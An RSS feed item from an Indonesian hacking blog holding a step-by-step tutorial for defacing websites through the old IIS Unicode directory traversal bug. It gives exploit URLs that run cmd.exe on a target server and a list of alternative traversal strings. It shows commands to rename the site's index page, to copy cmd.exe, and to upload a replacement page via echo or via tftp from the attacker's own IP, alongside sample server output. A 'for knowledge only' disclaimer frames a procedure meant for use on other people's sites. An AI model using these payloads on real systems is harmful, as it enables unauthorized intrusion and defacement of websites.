<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>My web</title>
		<link>http://habul.ucoz.com/</link>
		<description>Blog</description>
		<lastBuildDate>Sun, 17 Jan 2010 06:15:08 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="https://habul.ucoz.com/blog/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>Deface Website – Via URL – Windows Version</title>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Zzzz….. *Clink* &quot;We Come Back” (((dolby stereo))) &lt;img id=&quot;new&quot; style=&quot;border: 0pt none ; margin: 0pt; padding: 0pt;&quot; src=&quot;http://benjamin0331.googlepages.com/lol.png&quot; alt=&quot;&quot;&gt;
pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya??
pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ?
hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat
ato bahkan berlipat-lipat &lt;img id=&quot;new&quot; style=&quot;border: 0pt none ; margin: 0pt; padding: 0pt;&quot; src=&quot;http://benjamin0331.googlepages.com/lol.png&quot; alt=&quot;&quot;&gt;
. Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali
kontoversi baik positif/negatif, posting kali ini bukannya ngajarin
kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen
berbagi pengetahuan saja ga` ada motif laen dan kita juga ga
menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah
ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya
manusia yang egois dan sel...</description>
			<content:encoded>&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Zzzz….. *Clink* &quot;We Come Back” (((dolby stereo))) &lt;img id=&quot;new&quot; style=&quot;border: 0pt none ; margin: 0pt; padding: 0pt;&quot; src=&quot;http://benjamin0331.googlepages.com/lol.png&quot; alt=&quot;&quot;&gt;
pakabar sob dekaters ?? gimana da pahamin lom posting sebelumnya??
pasti rada puyeng ya!! ato malah pusingnya ampe sekarang belom sembuh ?
hehhehe, kali ini kita tambahin pusing kalian jadi 2 ( dua ) kali lipat
ato bahkan berlipat-lipat &lt;img id=&quot;new&quot; style=&quot;border: 0pt none ; margin: 0pt; padding: 0pt;&quot; src=&quot;http://benjamin0331.googlepages.com/lol.png&quot; alt=&quot;&quot;&gt;
. Gini Sob, kita tau ilmu didunia maya luas banged dan banyak sekali
kontoversi baik positif/negatif, posting kali ini bukannya ngajarin
kalian untuk berbuat jahat ato usil tapi kita hanya sekedar pengen
berbagi pengetahuan saja ga` ada motif laen dan kita juga ga
menganjurkan untuk kalian mempraktekkannya, setiap tindakan kita sudah
ada yang mencatatnya kita tahu itu.. tapi namanya juga kita hanya
manusia yang egois dan selalu mendahulukan kepuasan batin nah.. itu
awal dari kehancuran kita sendiri dan nantinya dimintai
pertanggung-jawaban dari semua itu.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Aduh, koq jadi ngelantur gini ya &lt;img id=&quot;new&quot; style=&quot;border: 0pt none ; margin: 0pt; padding: 0pt;&quot; src=&quot;http://benjamin0331.googlepages.com/smile.png&quot; alt=&quot;&quot;&gt; ) Ok Sob , kita langusng ke pokok pembahasan tapi pesan kita &lt;span style=&quot;font-weight: bold;&quot;&gt;&quot;Resiko Ditanggung Masing – Masing”&lt;/span&gt;.
Pada posting ini kita coba membahas &quot;deface website” apa itu ?? Deface
adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan
sebuah situs. Tentu saja prosesnya ilakukan dengan memanfaatkan
kelemahan dari situs tersebut, sehingga kalo sob adalah web master dan
sob ngerubah tampilan halaman situs yang sob punya tentu saja itu nggak
bisa disebut deface…heheheh. Banyak yang bertanya &quot;gimana sich
nge-deface situs?” proses deface dilakukan dengan memanfaatkan lubang
(hole) yang terdapat pada server tempat situs itu berada. Sehingga hal
pertama yang harus kalian ketahui untuk melakukan proses deface adalah
OS (Operating System) dari server situs tersebut. Hal ini karena
karakteristik dari tiap OS yang berbeda-beda, contohnya antara IIS
dengan BSD tentu saja sangat berbeda apabila kita ingin melakukan
deface diantara kedua OS tsb. Operating System atau OS biasanya kalo
kita kelompikin ke 2 keluarga besar,yaitu :&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;1. IIS (server untuk microsoft, dkk)&lt;/span&gt;&lt;br&gt;
&lt;span style=&quot;font-size: 85%;&quot;&gt;2. Unix(linux,BSD,IRIX,SOLARIS,dsb)&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;elalui tutor ini saya teh hanya ingin
berbagi pengalaman mengenai cara men-deface website yang menggunakan
Microsoft Internet Information Server atau Microsoft IIS. Harap DeFaceR
(sebutan bagi org yg suka deface..;p) ketahui…Microsoft Internet
Information Server atau MS IIS 4.0/5.0 memiliki suatu bug yang
dinamakan &quot;unicode bug”. Sayah tidak akan menjelaskan panjang lebar
mengenai &quot;unicode bug” ini karena sayah takut salah menjelaskan
(ssSSTTtHHH!! gn bilang sapa2 yah sebenernyah sayah teh emang gak tau
…ehehehheehhe..;p~). Yang jelas dengan bug ini kita bisa mengeksplorasi
komputer target dengan hanya menggunakan internet browser.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;OK…mari kita mulai…Pertama kita cari site site target terlebih dahulu di search engine (google,yahoo,dll)…key nya terserah&lt;/span&gt;&lt;br&gt;
&lt;span style=&quot;font-size: 85%;&quot;&gt;kowe…..Lalu utk mengetahui site itu
menggunakan MS IIS 4.0/5.0…Kita scan terlebih dahulu di
www.netcraft.com……dapat site yah..??…Okeh..setelah kita mendapatkan
site yg menggunakan MS IIS 4.0/5.0 …Langkah selanjutnya utk mengetahui
site tersebut belum di-patch bug unicode nya mari kita scan site
tersebut di mirc (utk mengeteahui cara scan lewat mirc….coba koe buka
http://www.jasakom.com/hacking.asp page 3 Scanning Exploit Unicode
Dengan MIRC),bisa juga memakai sopwer yg&lt;/span&gt;&lt;br&gt;
&lt;span style=&quot;font-size: 85%;&quot;&gt;bisa and DL di http://accessftp.topcities.com/…. or memakai cara manual yg lebih sering kita gunakan ehehhehehhee…contoh:&lt;/span&gt;&lt;/p&gt;

&lt;span style=&quot;font-size: 85%;&quot;&gt;http://wwwtargethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:&amp;#92;&lt;/span&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Ada dua kemungkinan yang tampil pada browser Anda yaitu:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Kahiji : Muncul pesan ERROR …&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Kaduana : Muncul daftar file-file dari drive C pada komputer server&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;target. Bila ini terjadi maka&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;www.targethost.com tadi ada kemungkinan untuk bisa kita deface…&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Mari kita perhatikan URL aneh bin ajaib diatas. Akan sayah bagi URL&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;diatas menjadi empat bagian yaitu :&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;· Bagian host, yaitu &quot;http://www.targethost.com”&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;· Bagian exploit string, yaitu &quot;/scripts/..%255c..%255c”&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;· Bagian folder, yaitu &quot;/winnt/system32/”&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;· Bagian command, yaitu &quot;cmd.exe?/c+dir+c:&amp;#92;”&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Kita lihat pada
bagian command diatas menunjukkan perintah &quot;dir c:&amp;#92;” yang berarti
melihat seluruh file-file yang berada pada root drive C. Koe bisa
mencoba perintah yang lain seperti &quot;dir d:&amp;#92;” atau yang lain. Ingat, Koe
harus mengganti karakter spasi dengan tanda &quot;+”. Koe bahkan bisa menge
tahui konfigurasi IP address komputer tujuan dengan mengetikkan
perintah &quot;ipconfig.exe /all”&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Selain itu ada
beberapa kemungkinan yaitu bisa saja URL diatas masih menampilkan error
pada browser koe. Untuk itu koe ganti sajah bagian eksploit stringnyah,
eksploit string yg sering tembus adalah :&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /cgi-bin/..%255c..%255c&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /msadc/..%e0&amp;#92;%80&amp;#92;%af../..&amp;#92;%e0&amp;#92;%80&amp;#92;%af../..&amp;#92;%e0&amp;#92;%80&amp;#92;%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;- /scripts/..%255c..%255c&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Jika semua
pilihan eksploit string diatas masih memunculkan pesan error pada
browser koe maka kemungkinan besar IIS pada web server sudah di-patch
bug unicode nya (OR IE kowe yg lagie dodolss …hiheiehiehiehei). Dan koe
bisa memilih situs lain sebagai sasaran….(yg sabar yah nak nyari
targetnyah…ehehhehehe).&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Lanjuttt……udeh
dapet site yg bug unicodenyah gak di patch..??….Langkah berikutnya
adalah mengetahui di folder manakah diletakkan dokumen-dokumen web
seperti
default.htm/html/asp,,index.htm/html/asp,home.htm/html/asp,main.htm/html/asp,.ada
juga yg pake .php/php3/shtml. Folder ini dinamakan web root. Biasanya
web root berada di C:&amp;#92;InetPub&amp;#92;wwwroot&amp;#92; atau D:&amp;#92;InetPub&amp;#92;wwwroot. Tapi
terkadang web administrator menggantinya dengan yang lain. Untuk
mengetahuinya koe cukup mengetikkan URL seperti di bawah ini&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+set&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;URL diatas akan
menampilkan daftar environment variable dari web server sasaran.
Kebuka..??…Nah tugas koe skrg adalah mencari PATH_TRANSLATED atau
tulisan PATH_TRANSLATEDnyah…gak ada yahh ..??…coba deh koe ripresh
lagehh…udah ketemuuu…nah skrg kita DIR deh tuh si PATH_TRANSLATED
nyah…..Kita ambil contoh PATH_TRANSLATEDnyah :&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;C:&amp;#92;InetPub&amp;#92;wwwroot….Perintahnya ng-DIR nyah :&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:&amp;#92;InetPub&amp;#92;wwwroot&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Huaaaaaaa….isinyah
banyak banged yahh…..mana dokumen2 web yg kita curigain itu ada 3
bijih. lagehh… .hemm santeyy…oiyahh…lupa sayah…Tugas kita setelah
ng-DIR PATH_TRANSLATEDnyah….. truss kita cari dokumen web itu disitu
utk kita RENAME….gemana kalo misalnyah dokumen2 web yg kita curigain
itu ada 3..santeyy…coba skrg koe buka site aslinyah di laen window….&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com == neh yg ini……di situ kan alias di&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:&amp;#92;InetPub&amp;#92;wwwroot&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;dokumen2 web nyah ada 3 macem pasti kita bingung yg mana neh yg mo di RENAME….misalnya : di&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:&amp;#92;InetPub&amp;#92;wwwroot&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;itu ada :&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Directory of C:&amp;#92;InetPub&amp;#92;wwwroot&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;07/20/01 03:21p 1,590 default.htm&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;07/20/01 03:21p 590 index.html&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;07/20/01 03:21p 3,453 main.html&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Udah di buka
kan site aslinyah…nah coba masukin salah satu dokumen web itu di site
asli nyah… contoh : http://www.targethost.com/default.htm kita liad
hasilnya apa kah sama gambarnya (halaman depannya) setelah kita masukin
dokumen web tadee.waww ternyata tidak sama hemm.coba masukin lageh
salah satu dokumen web itu site aslinyah.mMmm..kita masukin yg
main.html.waww waww..ternyata sama gambarnyahh.Nah skrg kita RENAME deh
yg main.html ituu. perintahnya :&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ren+C:&amp;#92;InetPub&amp;#92;wwwroot&amp;#92;main.html+gue.html&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Lihat apa yg terjadi di IE kitaa&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;CGI Error&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;The specified CGI application misbehaved by not returning a complete&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;set of HTTP headers. The headers it did return are:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Access is denied&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Yahhhh..akses
dineyy.hiekksss jgn nyerah bro` kita carih lageh targetnyah okeHh
!!!Dapat targetnyah..??udah di RENAME nyah??.Hasilnya setelah di RENAME
seperti di bawah ini bukan??&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;CGI Error&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;The specified CGI application misbehaved by not returning a complete&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;set of HTTP headers. The headers it did return are :&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Kalo iyahh.waaa
selamat anda telah merubah or berhasil men-deface halaman depan web
site tersebut.kalo gak caya buka ajah site aslinyah pasti ERROR kann
ehehhehehhee (Jgn lupa kita simpan C:&amp;#92;InetPub&amp;#92;wwwroot&amp;#92;main.html *file
yg kita rename tadi di notepad utk langkah selanjutnyah*)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Sekarang koe tugasnyah meng-upload file koe ke site tadee Ada dua cara my bro` Pertama lewat ECHO..Kedua lewat TFTP32.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;*Cara pertama :*&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Utk meng-upload
file lewat echo sebelumnyah kita harus mengcopy file cmd.exe pada
direktori C:&amp;#92;winnt&amp;#92;system32 ke suatu folder lain atau folder yang sama
dengan nama lain, misalnya cmdku.exe. Untuk meng-copy cmd.exe menjadi
cmdku.exe pada folder winnt&amp;#92;system32 maka cukup ketik URL berikut :&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;http://www.targethost.com/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:&amp;#92;winnt&amp;#92;system32&amp;#92;cmd.exe+c:&amp;#92;cmdku.exe&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Pasti hasilnya akan seperti di bawah ini :&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;CGI Error&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;The specified CGI application misbehaved by not returning a complete&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;set of HTTP headers. The headers it did return are :&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;1 file(s) copied.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span class=&quot;fullpost&quot;&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;Tujuan kita
meng-copy cmd.exe menjadi cmdku.exe adalah agar kita bisa menjalankan
perintah echo dengan lengkap. Apabila Anda menggunakan cmd.exe maka
perintah echo tidak bisa digunakan untuk menulis atau membuat file.&lt;/span&gt;&lt;/span&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: 85%;&quot;&gt;&lt;br&gt;
Okeih Sob skrg mari kita up-load file nya lewat perintah echo perintahnya :&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;dapat dilihat &lt;a href=&quot;http://psychophobia.co.cc/perintah%20echo%20untuk%20deface%20web.txt&quot;&gt;disini&lt;/a&gt;&lt;br&gt;
&lt;span class=&quot;fullpost&quot; style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;Kita liat apa yg terjadi di IE kita.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;CGI Error&lt;br&gt;
The specified CGI application misbehaved by not returning a complete&lt;br&gt;
set of HTTP headers. The headers it did return are :&lt;/p&gt;
&lt;p&gt;Waa..waaa.selamat anda telah berhasil meng-upload file anda lewat cara echo tadee silahkan buka web site target tadi&lt;/p&gt;
&lt;p&gt;Oiyahh sayah uraikan sedikit URL ajaib tadii. Sayah akan membagi URL tadi menjadi empat bagian :&lt;br&gt;
&lt;/p&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian command yaitu, cmdku.exe?/c+echo+&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian HTML&lt;/span&gt;&lt;/li&gt;
&lt;p&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian PATH_TRANSLATEDnyah(rootnyah)+Dokumen webnyah yaitu,&lt;br&gt;
C:&amp;#92;InetPub&amp;#92;wwwroot&amp;#92;main.html&lt;/span&gt;&lt;/li&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;Cara Kedua&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;
Utk meng-upload file lewat TFTP32 sebelumnyah koe2 orang harus
mendownload sopwer TFTP32 terlebih dahulu di http://www.download.com
ketik keynya TFTP32 dan koe harus maen diserver (sebab di user pasti
takkan bisa). Meng-upload file lewat TFTP32.. koe tdk perlu mengcopy
cmd.exe nyah langsung sajah.mari kita mulai meng-uploadnyah perintahnya
:&lt;br&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;
&lt;li&gt;http://www.targethost.com/scripts/..%255c..%255c&lt;br&gt;
/winnt/system32/cmd.exe?/c+tftp+-i+202.95.145.71(IP mu)+get+antique.htm(file yg mau koe&lt;br&gt;
up-load)+ C:&amp;#92;InetPub&amp;#92;wwwroot&amp;#92;main.html&lt;/li&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;Kita liat lagi apa yg terjadi di IE kita.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;CGI Error&lt;br&gt;
The specified CGI application misbehaved by not returning a complete&lt;br&gt;
set of HTTP headers. The headers it did return are :&lt;/p&gt;
&lt;p&gt;Waa..waaa.selamat anda telah berhasil meng-upload file anda memakai sopwer TFTP32 tadee silahkan buka web site target tadi.&lt;/p&gt;
&lt;p&gt;Sayah akan uraikan juga URL tadee menjadi 4 bagian :&lt;br&gt;
&lt;/p&gt;
&lt;ul&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;
&lt;li&gt;Bagian hosting dan exploit string yaitu, http://www.targethost.com/scripts/..%255c..%255c&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian folder, yaitu /winnt/system32/&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian command, yaitu cmd.exe?/c+tftp+-i+202.95.145.71(IPmu)+get+antique.htm(file yg mau koe up-load)+&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span class=&quot;fullpost&quot;&gt;Bagian PATH_TRANSLATEDNYAH(rootnyah)+Dokumen webnyah yaitu,&lt;br&gt;
C:&amp;#92;InetPub&amp;#92;wwwroot&amp;#92;main.html&lt;/span&gt;&lt;/li&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/ul&gt;
&lt;p&gt;&lt;span style=&quot;font-size: 85%;&quot;&gt;&lt;span&gt;&lt;span&gt;&lt;span&gt;Kekurangannyah dalam
meng-upload file lewat TFTP32terkadang suatu server (web site) tidak
mau menerima up-load file kita tadee.Jikalau itu terjadi maka
gunakanlah cara pertama diatas tadee.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Sebelumnya dan sesudahnyah sayah mo ngejelasin bahwa tutorial ini
tidak mempunyai maksud tertentu selain untuk ilmu pengetahuan dan
kebebasan dalam berbagi ilmu pengetahuan. Sayah tidak bertanggung jawab
apapun terhadap segala sesuatu yang terjadi akibat tutorial ini.
Tutorial ini bersifat terbuka yang berarti Anda bisa memberikan kritik
dan saran terhadap tutorial ini.&lt;/p&gt;
&lt;p&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;——————————————–&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;END&lt;/span&gt;&lt;span style=&quot;color: rgb(255, 0, 0);&quot;&gt;————————————————–&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Nah itu adalah cara pemanfaatan lubang di IIS server yang dikenal
dengan nama UNICODE, untuk tambahan bahwa sekarang UNICODE telah
berkembang banyak ditemukan beberapa bug baru yang dapat dimanfaatkan
